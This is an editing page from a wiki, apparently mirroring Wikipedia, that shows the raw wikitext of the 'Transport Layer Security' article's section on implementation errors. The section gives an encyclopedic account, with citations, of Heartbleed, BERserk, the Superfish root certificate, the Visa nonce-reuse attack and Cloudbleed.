Open main menu
Home
Random
Recent changes
Special pages
Community portal
Preferences
About Wikipedia
Disclaimers
Incubator escapee wiki
Search
User menu
Talk
Dark mode
Contributions
Create account
Log in
Editing
Transport Layer Security
(section)
Warning:
You are not logged in. Your IP address will be publicly visible if you make any edits. If you
log in
or
create an account
, your edits will be attributed to your username, along with other benefits.
Anti-spam check. Do
not
fill this in!
====Implementation errors: {{Anchor|Heartbleed}}Heartbleed bug, {{Anchor|BERserk}}BERserk attack, Cloudflare bug==== {{Main|Heartbleed|Cloudbleed}} The [[Heartbleed]] bug is a serious vulnerability specific to the implementation of SSL/TLS in the popular [[OpenSSL]] cryptographic software library, affecting versions 1.0.1 to 1.0.1f. This weakness, reported in April 2014, allows attackers to steal [[Public-key cryptography|private keys]] from servers that should normally be protected.<ref>{{cite news|url=https://www.washingtonpost.com/blogs/style-blog/wp/2014/04/09/why-is-it-called-the-heartbleed-bug|title=Why is it called the 'Heartbleed Bug'?|newspaper=The Washington Post|date=2014-04-09|url-status=live|archive-url=https://web.archive.org/web/20141009063758/http://www.washingtonpost.com/blogs/style-blog/wp/2014/04/09/why-is-it-called-the-heartbleed-bug|archive-date=2014-10-09}}</ref> The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret private keys associated with the [[X.509|public certificates]] used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.<ref>{{cite web|url=https://blogs.comodo.com/e-commerce/heartbleed-bug-comodo-urges-openssl-users-to-apply-patch|title=Heartbleed Bug vulnerability [9 April 2014]|publisher=[[Comodo Group]]|url-status=live|archive-url=https://web.archive.org/web/20140705212748/https://blogs.comodo.com/e-commerce/heartbleed-bug-comodo-urges-openssl-users-to-apply-patch|archive-date=5 July 2014}}</ref> The vulnerability is caused by a [[buffer over-read]] bug in the OpenSSL software, rather than a defect in the SSL or TLS protocol specification. In September 2014, a variant of [[Daniel Bleichenbacher]]'s PKCS#1 v1.5 RSA Signature Forgery vulnerability<ref>{{cite web|url=http://www.imc.org/ietf-openpgp/mail-archive/msg06063.html|title=Bleichenbacher's RSA signature forgery based on implementation error|date=August 2006|first=Daniel|last=Bleichenbacher|author-link=Daniel Bleichenbacher|url-status=dead|archive-url=https://web.archive.org/web/20141216203704/http://www.imc.org/ietf-openpgp/mail-archive/msg06063.html|archive-date=2014-12-16}}</ref> was announced by Intel Security Advanced Threat Research. This attack, dubbed BERserk, is a result of incomplete ASN.1 length decoding of public key signatures in some SSL implementations, and allows a man-in-the-middle attack by forging a public key signature.<ref>{{cite web|url=http://www.intelsecurity.com/advanced-threat-research|title=BERserk|date=September 2014|publisher=Intel Security: Advanced Threat Research|url-status=live|archive-url=https://web.archive.org/web/20150112153121/http://www.intelsecurity.com/advanced-threat-research|archive-date=2015-01-12}}</ref> In February 2015, after media reported the hidden pre-installation of [[superfish]] adware on some Lenovo notebooks,<ref>{{cite web|url=https://arstechnica.com/information-technology/2015/02/lenovo-pcs-ship-with-man-in-the-middle-adware-that-breaks-https-connections|title=Lenovo PCs ship with man-in-the-middle adware that breaks HTTPS connections|last=Goodin|first=Dan|date=February 19, 2015|website=[[Ars Technica]]|access-date=December 10, 2017|url-status=live|archive-url=https://web.archive.org/web/20170912103610/https://arstechnica.com/information-technology/2015/02/lenovo-pcs-ship-with-man-in-the-middle-adware-that-breaks-https-connections|archive-date=September 12, 2017}}</ref> a researcher found a trusted root certificate on affected Lenovo machines to be insecure, as the keys could easily be accessed using the company name, Komodia, as a passphrase.<ref>{{cite web|first=Filippo|last=Valsorda|url=https://blog.filippo.io/komodia-superfish-ssl-validation-is-broken|title=Komodia/Superfish SSL validation is broken|publisher=Filippo.io|date=2015-02-20|url-status=live|archive-url=https://web.archive.org/web/20150224112141/https://blog.filippo.io/komodia-superfish-ssl-validation-is-broken|archive-date=2015-02-24}}</ref> The Komodia library was designed to intercept client-side TLS/SSL traffic for parental control and surveillance, but it was also used in numerous adware programs, including Superfish, that were often surreptitiously installed unbeknownst to the computer user. In turn, these [[potentially unwanted program]]s installed the corrupt root certificate, allowing attackers to completely control web traffic and confirm false websites as authentic. In May 2016, it was reported that dozens of Danish HTTPS-protected websites belonging to [[Visa Inc.]] were vulnerable to attacks allowing hackers to inject malicious code and forged content into the browsers of visitors.<ref name="forbidden">{{cite web|last1=Goodin|first1=Dan|title="Forbidden attack" makes dozens of HTTPS Visa sites vulnerable to tampering|url=https://arstechnica.com/security/2016/05/faulty-https-settings-leave-dozens-of-visa-sites-vulnerable-to-forgery-attacks|website=Ars Technica|date=26 May 2016|access-date=26 May 2016|url-status=live|archive-url=https://web.archive.org/web/20160526175713/http://arstechnica.com/security/2016/05/faulty-https-settings-leave-dozens-of-visa-sites-vulnerable-to-forgery-attacks|archive-date=26 May 2016}}</ref> The attacks worked because the TLS implementation used on the affected servers incorrectly reused random numbers ([[cryptographic nonce|nonces]]) that are intended to be used only once, ensuring that each [[#TLS handshake|TLS handshake]] is unique.<ref name=forbidden/> In February 2017, an implementation error caused by a single mistyped character in code used to parse HTML created a buffer overflow error on [[Cloudflare]] servers. Similar in its effects to the Heartbleed bug discovered in 2014, this overflow error, widely known as [[Cloudbleed]], allowed unauthorized third parties to read data in the memory of programs running on the servers—data that should otherwise have been protected by TLS.<ref>{{cite web|last1=Clark Estes|first1=Adam|title=Everything You Need to Know About Cloudbleed, the Latest Internet Security Disaster|url=https://gizmodo.com/everything-you-need-to-know-about-cloudbleed-the-lates-1792710616|website=[[Gizmodo]]|date=February 24, 2017|access-date=2017-02-24|url-status=live|archive-url=https://web.archive.org/web/20170225013516/http://gizmodo.com/everything-you-need-to-know-about-cloudbleed-the-lates-1792710616|archive-date=2017-02-25}}</ref>
Edit summary
(Briefly describe your changes)
By publishing changes, you agree to the
Terms of Use
, and you irrevocably agree to release your contribution under the
CC BY-SA 4.0 License
and the
GFDL
. You agree that a hyperlink or URL is sufficient attribution under the Creative Commons license.
Cancel
Editing help
(opens in new window)